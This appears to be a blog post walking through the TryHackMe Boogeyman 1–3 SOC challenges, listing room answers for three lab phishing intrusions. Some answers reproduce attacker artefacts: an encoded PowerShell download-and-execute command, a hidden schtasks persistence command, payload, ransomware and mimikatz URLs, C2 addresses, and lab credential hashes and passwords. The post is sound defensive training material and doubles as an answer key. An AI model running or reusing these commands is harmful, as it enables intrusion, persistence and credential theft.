Introduction

This post provides a walkthrough of analyzing three different cyberattack scenarios where phishing emails were the initial entry point. The video highlights real world case studies for SOC analysts and threat hunters by solving the three TryHackMe Boogeyman challenges that are part of the TryHackMe SOC level 1 capstone.

HackTheBox CPTS Study Notes

OSCP Study Notes

What is Blue Team in Cyber Security?

In cybersecurity, the “Blue Team” refers to a group of security professionals responsible for defending an organization’s information systems. Their primary role is to protect, monitor, and respond to security incidents. Blue Teams focus on:

  • Detecting vulnerabilities within systems and networks
  • Implementing security measures like firewalls, intrusion detection systems, and encryption
  • Monitoring for threats using security tools and logs
  • Responding to incidents and mitigating attacks when they occur
  • Performing regular security assessments to strengthen the organization’s defenses

They often work opposite the “Red Team,” which simulates attacks to test the Blue Team’s defenses.

What is SOC Analyst in Cyber Security

A SOC Analyst (Security Operations Center Analyst) is a cybersecurity professional who monitors and defends an organization’s IT infrastructure from cyber threats. Their main responsibilities include:

  1. Monitoring Security Alerts: Continuously reviewing logs, alerts, and other system notifications from security tools like firewalls, intrusion detection/prevention systems, and SIEM (Security Information and Event Management) platforms.
  2. Incident Detection and Response: Investigating potential security incidents and taking steps to contain, mitigate, and resolve them. This may involve isolating infected systems, analyzing malware, and coordinating with other teams to respond effectively.
  3. Threat Hunting: Proactively searching for potential threats that have not been detected by automated tools by analyzing trends and unusual activity.
  4. Reporting and Documentation: Creating reports on security incidents, vulnerabilities, and risks, and documenting their findings for future analysis or compliance.
  5. Collaboration: Working with other security teams, such as the Blue Team, to strengthen defenses and implement security policies and best practices.

SOC Analysts typically work in a Security Operations Center, where they monitor and safeguard the organization’s digital environment 24/7.

Breakdown of The Attack Scenarios

Scenario 1: Phishing Email with a Shortcut File:
In the first scenario, a phishing email contains a Windows shortcut (.lnk) attachment. This attachment, once opened, executes a series of PowerShell commands to exfiltrate data from the target system. The email was sent to an employee of Quick Logistics LLC, and the analysis involves examining the email, its headers, and the attached files using tools like LinkParser to reveal encoded commands.

The investigation shows that the PowerShell command contacts a Command-and-Control (C2) server to download additional malicious files. The email also used a third-party mail relay service (Elastic Email) to appear legitimate and bypass spam filters. The analysts uncover the C2 domain and decode Base64 encoded payloads using tools like Echo and Base64.

Scenario 2: Word Document with a VBA Macro:
In the second scenario, a phishing email contains a Word document with an embedded VBA macro. When opened, the macro calls a C2 server to retrieve an executable payload. This payload creates a scheduled task on the victim’s machine, allowing persistent control over the system. The analysts utilize a variety of tools to extract and analyze the artifacts, including the C2 domain information.

Scenario 3:HTA File and Domain Compromise:
The third attack involves an HTA (HTML Application) file, which, when opened, retrieves a malicious payload from the internet. This payload executes a series of actions that culminate in the compromise of the organization’s main domain controller. The analysts use ElasticSearch and other tools to examine logs, analyze network traffic, and identify the attacker’s activities.

TryHackMe Boogeyman 1

Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.

The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.

You are tasked to analyse and assess the impact of the compromise.

Room Answers

What is the email address used to send the phishing email?
agriffin@bpakcaging.xyz

What is the email address of the victim?

julianne.westcott@hotmail.com

What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?

elasticemail

What is the name of the file inside the encrypted attachment?

Invoice_20230103.lnk

What is the password of the encrypted attachment?

Invoice2023!

Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?

aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==

What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)
cdn.bpakcaging.xyz,files.bpakcaging.xyz

What is the name of the enumeration tool downloaded by the attacker?

seatbelt

What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.
C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

What is the software that uses the file in Q3?

Microsoft Sticky Notes

What is the name of the exfiltrated file?

protected_data.kdbx

What type of file uses the .kdbx file extension?

keepass

What is the encoding used during the exfiltration attempt of the sensitive file?

hex

What is the tool used for exfiltration?

nslookup

What software is used by the attacker to host its presumed file/payload server?
python

What HTTP method is used by the C2 for the output of the commands executed by the attacker?

POST

What is the protocol used during the exfiltration activity?

dns

What is the password of the exfiltrated file?

%p9^3!lL^Mz47E2GaT^y

What is the credit card number stored inside the exfiltrated file?

4024007128269551

TryHackMe Boogeyman 2

Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application from one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.

The security team was able to flag some suspicious commands executed on the workstation of Maxine, which prompted the investigation. Given this, you are tasked to analyse and assess the impact of the compromise.

Room Answers

What email was used to send the phishing email?
westaylor23@outlook.com

What is the email of the victim employee?

maxine.beck@quicklogisticsorg.onmicrosoft.com

What is the name of the attached malicious document?

Resume_WesleyTaylor.doc

What is the MD5 hash of the malicious attachment?

52c4384a0b9e248b95804352ebec6c5b

What URL is used to download the stage 2 payload based on the document’s macro?

https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png

What is the name of the process that executed the newly downloaded stage 2 payload?

wscript.exe

What is the full file path of the malicious stage 2 payload?

C:\ProgramData\update.js

What is the PID of the process that executed the stage 2 payload?

4260

What is the parent PID of the process that executed the stage 2 payload?

1124

What URL is used to download the malicious binary executed by the stage 2 payload?

https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe

What is the PID of the malicious process used to establish the C2 connection?

6216

What is the full file path of the malicious process used to establish the C2 connection?

C:\Windows\Tasks\updater.exe

What is the IP address and port of the C2 connection initiated by the malicious binary? (Format: IP address:port)

128.199.95.189:8080

What is the full file path of the malicious email attachment based on the memory dump?

C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc

The attacker implanted a scheduled task right after establishing the c2 callback. What is the full command used by the attacker to maintain persistent access?

schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR ‘C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \”IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\”‘

TryHackMe Boogeyman 3

Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson. 

The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.

Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.

Room Answers

What is the PID of the process that executed the initial stage 1 payload?
6392

The stage 1 payload attempted to implant a file to another location. What is the full command-line value of this execution?

“C:\Windows\System32\xcopy.exe” /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat

The implanted file was eventually used and executed by the stage 1 payload. What is the full command-line value of this execution?

“C:\Windows\System32\rundll32.exe” D:\review.dat,DllRegisterServer

The stage 1 payload established a persistence mechanism. What is the name of the scheduled task created by the malicious script?

Review

The execution of the implanted file inside the machine has initiated a potential C2 connection. What is the IP and port used by this connection? (format: IP:port)

165.232.170.151:80

The attacker has discovered that the current access is a local administrator. What is the name of the process used by the attacker to execute a UAC bypass?

fodhelper.exe

Having a high privilege machine access, the attacker attempted to dump the credentials inside the machine. What is the GitHub link used by the attacker to download a tool for credential dumping?

https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

After successfully dumping the credentials inside the machine, the attacker used the credentials to gain access to another machine. What is the username and hash of the new credential pair? (format: username:hash)

itadmin:F84769D250EB95EB2D7D8B4A1C5613F2

Using the new credentials, the attacker attempted to enumerate accessible file shares. What is the name of the file accessed by the attacker from a remote share?

IT_Automation.ps1

After getting the contents of the remote file, the attacker used the new credentials to move laterally. What is the new set of credentials discovered by the attacker? (format: username:password)

QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987

What is the hostname of the attacker’s target machine for its lateral movement attempt?

WKSTN-1327

Using the malicious command executed by the attacker from the first machine to move laterally, what is the parent process name of the malicious command executed on the second compromised machine?

wsmprovhost.exe

The attacker then dumped the hashes in this second machine. What is the username and hash of the newly dumped credentials? (format: username:hash)

administrator:00f80f2538dcb54e7adc715c0e7091ec

After gaining access to the domain controller, the attacker attempted to dump the hashes via a DCSync attack. Aside from the administrator account, what account did the attacker dump?

backupda

After dumping the hashes, the attacker attempted to download another remote file to execute ransomware. What is the link used by the attacker to download the ransomware binary?

http://ff.sillytechninja.io/ransomboogey.exe

Video Walkthrough

,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles